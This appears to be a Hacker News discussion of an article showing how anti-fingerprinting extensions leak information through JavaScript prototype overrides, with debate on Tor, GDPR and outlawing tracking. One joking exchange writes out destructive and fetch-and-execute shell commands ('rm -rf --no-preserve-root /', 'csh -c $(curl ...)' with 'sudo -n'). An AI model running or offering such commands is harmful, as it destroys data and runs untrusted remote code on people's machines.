Anti-fingerprinting extensions tend to make fingerprinting easier
palant.info
palant.info
delete screen.width;
delete screen.height;
> And suddenly screen.width and screen.height are restored to their original values. Fingerprinting can now use two data points instead of one: not merely the real display resolution but also the fake one. Even if that fake display resolution were extremely common, it would still make the fingerprint slightly more precise.> Is this magic? No, just how JavaScript prototypes work. See, these properties are not defined on the screen object itself, they are part of the object’s prototype. So that privacy extension added an override for prototype’s properties. With the override removed the original properties became visible again.
This seems like a flaw in the browser extension model. There should be a way of overriding these properties outside the page's javascript environment itself, before it's initialized, in a way that's immutable to anything that runs afterwards.
Basically, you want the VM to encapsulate everything and give the same result everywhere. You need a theoretical approach, a system of encapsulation and testing. But if you get that, the benefits would extend beyond anti-finger-printing, to privacy and also to making the platform reliable.
There is also a shorter version in a blog post: https://antoinevastel.com/tracking/2018/07/01/eval-canvasdef... (Evaluating the privacy implications of a canvas fingerprinting countermeasure)
Did you also evaluate fingerprintjs in that context?
Also, did you use css tracking techniques, too? Because there are hundreds of them, especially since the logical conditions spec.
In my own Browser I'm trying to "fake" behaviours, so that it looks like an e.g. Chrome useragent is browsing the website. I'm also filtering a lot of CSS and HTML that could be abused to track users which is, honestly, a lot.
Even the Accept header alone is enough to identify the engine. If you then use a clever webfont you'll have the navigator's version and OS identified due to antialiasing behaving differently...
I'm also curious how you evaluated the fingerprintability...is there a project that you were using for that, which someone could maybe test their own browser against?
It's still very prototypical, so use with care. Lots of things don't work yet.
Nevermind my last question, I've found your project on github that you used to test the fingerprintability (fp-scanner) [1] and wanted to let others know.
Fingerprinting is an exploit, an attack on the person and machine. It is tracking using mechanisms that were not meant for tracking.
It is without consent and it is without user control (you can clear cookies, you can't clear the fingerprint you've let on thousands of website you browse every week).
Cookies, Local Storage (and IP) should be the only legally authorised means of tracking
What also makes this a little different is that there's not many nefarious actors that truly benefit from fingerprinting random people. Fingerprinting is very useful in large scale operations, and it's hard to maintain a large scale web presence as an outlaw.
I fully agree that fingerprinting should be outlawed by privacy directives. But writing such a law correctly is really tough.
I do not think laws go far enough because we live in a global society and laws don't exactly apply globally.
How is that true? If you don't visit X site then X site can't fingerprint you. I'd say technically it's the user's fault if they run random code on their computer and using a browser that sends this information back to the fingerprinting party.
I'd say most of the best sites of the internet could be read just fine w/o Javascript or even with just wget.
If someone made an application that downloaded web pages and executed the contents with SUDO privileges, would I be exploiting someone if my website was 'rm -rf --no-preserve-root /'?
Yes.
> csh -c $(curl dev.sansorgan.es)
(I specified csh as anyone willing to try this probably wouldn't have it installed).
sudo -n
You don't want to give away that you are using sudo to anyone that does not first read the script.Yes.
Allowing predatory and/or negligent entities to entrap people with less-than-expert knowledge of the relevant industry/technology/whatever is something we should avoid if our goal is to build a society for the common good. The whole point is to watch each other’s backs, not to create a web of obscure threats where only the truly paranoid can remain safe and avoid being exploited.
Indeed, a lot of companies are paying a lot of people a lot of money to spend a lot of their working hours figuring out newer and more-resilient ways of doing this stuff. How long has it been since persistent Flash cookies? Looks like sometime around 2009:
https://en.wikipedia.org/wiki/Local_shared_object#Privacy_co...
I think there's a project out there for an enterprising public-interest researcher to graph how many of these attempts and techniques were developed and popularized after Facebook started allowing people outside of universities to register for an account.
It's better to make browsers unfingerprintable than trying to outlaw the practice.
Consider what technical success looks like. How many nice things can't we have, if we need to worry about how they will be abused for fingerprinting?
Better to succeed politically and fail technically than the other way around.
For a site to be completely out of reach of the US/EU, all of the involved companies (site operator, fingerprinting provider, company paying for the advertising, ad network provider + the other middlemen involved in serving that ad) would have to have zero connection to the US/EU.
If websites choose to sacrifice usability to be able to fingerprint users, that's on them.
The only way that I think a law could assist with this would be if the governments would force all websites of legal businesses to work without javascript as well as via tor, but even then it will go unenforced.
That being said, I do not think that fingerprinting is an exploit as browsers come build-in with technologies that are meant for fingerprinting (see the ping attribute for example).
tired of closing useless cookie notifications on every site
"What you'd rather want is finding the largest group out there and joining it."
Presumably there is a threshhold for how large the group must be before the value of fingerprinting to advertisers drops.
That is one question.
Another question is what value to the advertiser is there, if any, in the data contained in the fingerprint itself (beyond its value in forming a fingerprint).
Hypothetical. User disables Javascript, CSS, does not send Cookies, does not send User-Agent. User only sends a minumum number of headers needed to retrieve the page. For example, Host: and Connection: only.
Putting aside arguments about whether or not this user is more or less "unique" than other users (the size of the group sending minimal data may be small), as well as any arguments about "breaking websites", is the data in the fingerprint valuable to advertisers.
For example, is the advertiser interested in guessing whether the user is using a Javascript and CSS-enabled browser that stores cookies, etc. Will the advertiser perceive the user as a more or less worthy target than another user due to the specifics of the fingerprint.
It's not like anyone targets ads to people with specific screen resolutions (and I don't think people would care if they did). The problem is that the data is used to track your activity. The information it contains is "are you the same person as that other visit we tracked".
There's not much they'd do with that information (as you say, while it's technically possible, no one cares enough to make an advertising system that works without JavaScript).
The main use case would probably be a primitive way to track which pages are visited in which order, how popular various links are, which paths people took to get to a specific page, etc. Normal tracking stuff which I don't personally have a problem with, but privacy activists often tend to.
Even the example given as finally working will show difference with the native method, the bound function will have a property `name` set to `bound`, while the native one has a `name` property set to `get width`.
My opinion on this is that only the browser can really foil fingerprinting based on surveying the properties of DOM objects.
If a piece of anti-fingerprinting software hides more information than it reveals, it's a net positive. If it does the opposite, it's actively harmful. There's probably a nice formulation of this in terms of entropy, but I can't quite state it, so hopefully this makes sense.
On mobile? You’ve either got an Android phone, or iOS device, either way they ping Gmail and whatnot so Google knows your IP to correlate with.
1. Everybody uses js. If you have it turned off, you are in a very tiny group, and now you’re easier to track. Remember that js is not the only mechanism to fingerprint a user.
2. Much of the web does not work with js turned off.
If a website forces me to use js in order to use it, I will question it, 98% of them is not worth it in my case.
Remember js was invented to add websites dynamism, not to serve for surveillance capitalism. (Okay, Big corporations was involved in creation of js, but that does not constitute every action they take)
I know, the solution presented there isn’t perfect. But IMHO it’s as close as it gets, and it should be sufficiently advanced that detection should be complicated due to differences in browsers and extensions.
How about replacing the original method (on the prototype) with a proxy to that method that intercepts apply?
original_functions[Function.prototype.toString.toString()] = originalToStringStr;https://developer.mozilla.org/en-US/docs/Web/CSS/@media/devi...
Not because iPhones or Safari are any more private. Just because it's a fixed size browser that you can't customize with extensions and looks identical to 20% of all other sessions.
Do Content Blockers qualify as extentions?
The use of certain content blockers can be detected, but it’s not a very consistent metric.
Screen size, canvas, and user agent are use more often because they never change.
An easy example in the ad tech space would be ad attribution. You don’t have to use any personal identifying information to actually run the specific advertisement to the user for but the PII is then used to correlate whether the ad was effective or contributed to a purchase.
On a more serious note, do we have any data on how well the "do not call" list worked out?
I am not sure what you mean with 'Nigerian prince', but since a lot of e-mail scammers claim to be nigerian princes I will assume you meant that.
The problem isn't that some tiny website somewhere uses fingerprinting, because they can't follow you around the web.
The problem is companies like Google tracking people around the internet. You can fine them if it turns out that they use fingerprinting techniques to track people. Seems pretty straight forward to me.
I've never used it myself so I don't know if it still works but I remember reading about it here on HN a few years ago or so.
I think however that if it even still works there is a risk that you may start being prompted with a lot more CAPTCHAs. But again, haven't tried it so don't know if that would happen or not.
There will be an army of corporate lawyers that are going to try to find loopholes against an army of legislators trying to close them. Plus a few trolls using the new laws to threaten businesses. What starts with a simple idea quickly becomes a monstrosity like GDPR.
Here is how GDPR is likely to pan out in a few years. Some big companies get sued under GDPR. This sets precedents and makes complying with GDPR more expensive. Because it is now harder to comply with GDPR, that becomes a barrier to entry for new companies. The fact that the barrier to entry exists makes the big companies more profitable. And the fact that the regulatory scheme improves their profit margins will incentivize the internet giants to engage in regulatory capture and improve their profit margins even more.
The result? The big internet companies wind up like Brer Rabbit. They say, "Don’t throw me into the briar patch."
However, major advertisers and tracking companies are established companies with significant presence in the US and EU. They need servers everywhere to ensure low latency. I don't see how they could work around it if half of their business model is made illegal by Western governments. They'd have to return to doing tracking by ip and cookies (and maybe localstorage, whatever the law exempts) only. I don't see why that shouldn't be enough.
I agree in principle that fixing the browsers to remove fingerprinting vectors is the correct approach, and making tracking illegal is not. I just think making it illegal would work, at least mostly, because companies that are good at tracking would have to comply.
I don't know that I understand the reasoning behind this. The idea behind it is that it isn't the unique fingerprint that is valuable, it is correlation between different captures of the same unique fingerprint that is valuable. So a randomized fingerprint would he unique, but only for one session, and so the data has no value. If anyone understands the reasoning and could explain how I'm wrong I'd appreciate it.
Note: I am the author of this article.
A perfectly acceptable cost for my privacy.
If Firefox had bigger marketshare, that breakage would magically turn into bugs in the broken websites.
... which is probably why Firefox-with-resistFingerprinting doesn't have bigger marketshare.
Mr. Chicken, meet Ms. Egg.
The issue is that few people use firefox, and even fewer have this flag enabled, and as such it makes you stand out.
If you were worried that determined parties would develop new tracking technologies as a response, rest assured that they’re always doing that.
EDIT: Removed wording about the intentions of the inventors.
I don't believe that's a fair characterisation at all. The inventors of DNT may have been over-optimistic about potential adoption, but the intention was most certainly to bring about change.
No, DNT was completely meaningless from the moment it was proposed. Enabling it by default was just Microsoft pointing out that the emperor had no clothes. I don't even agree with you that it was well-intentioned; IMO it was a bad faith effort to push a non-fix, to try and hoodwink people into not calling for regulation and/or technical solutions with actual teeth.
Solutions which require cooperation from hostile attackers (i.e. advertisers) are not solutions.
Disabling or lying with JS method calls doesn't.
And there is an arms race, and it will not end. That is the nature of adversarial intelligence-gathering.
Your assumption seems to be that these changes won’t be recognized. But they are very easy to recognize, e.g. by grouping the values by IP address. Same IP address but constantly changing random values? Yes, that’s a very reliable fingerprint.
This a cat & mouse game and the leaders constantly change. Sometimes the mice are ahead, sometimes the cats.
Use Tor Browser so that your fingerprint will be identical to many thousands of other users.
Huge problem for criminals. Excellent solution for innocent people wanting to anonymize their browsing.
Plain false. It will leak a lot of stuff, starting with your IP address.
Yet another reason to avoid JavaScript.
If you mean "don't write JS" because you, personally, don't understand prototype-based languages... then you're a fool.
Don't use Javascript to do anti-fingerprinting? (JS is the only language available to extension writers)
Disable JS in your browser? (Breaks much of the web) . Don't use JS for web development? (I need to pay my bills)
PS: Guessing games are a poor means of communicating a point.
This is not what I meant, but I will say that you don't need to pay your bills by making the web any more of a spyware and adware infested sewer than it already is.
You as a developer and a human being have a choice of what to do with your life and your career.
No one is forced to be a JS developer, and it's ridiculous to pretend you are.
Speak plainly and without airs.
There are huge number of spyware and adware authors out there. It's very likely that quite a few of them are HN readers, and a pretty good chance that they're this article itself (as it concerns their business).
Do I have any reason to believe that you in particular are one of them? No.
Can I address such people when I reply to someone in a thread on browser fingerprinting who claims they need to write JavaScript to pay their bills? Yes.
Wait... I think we're there already.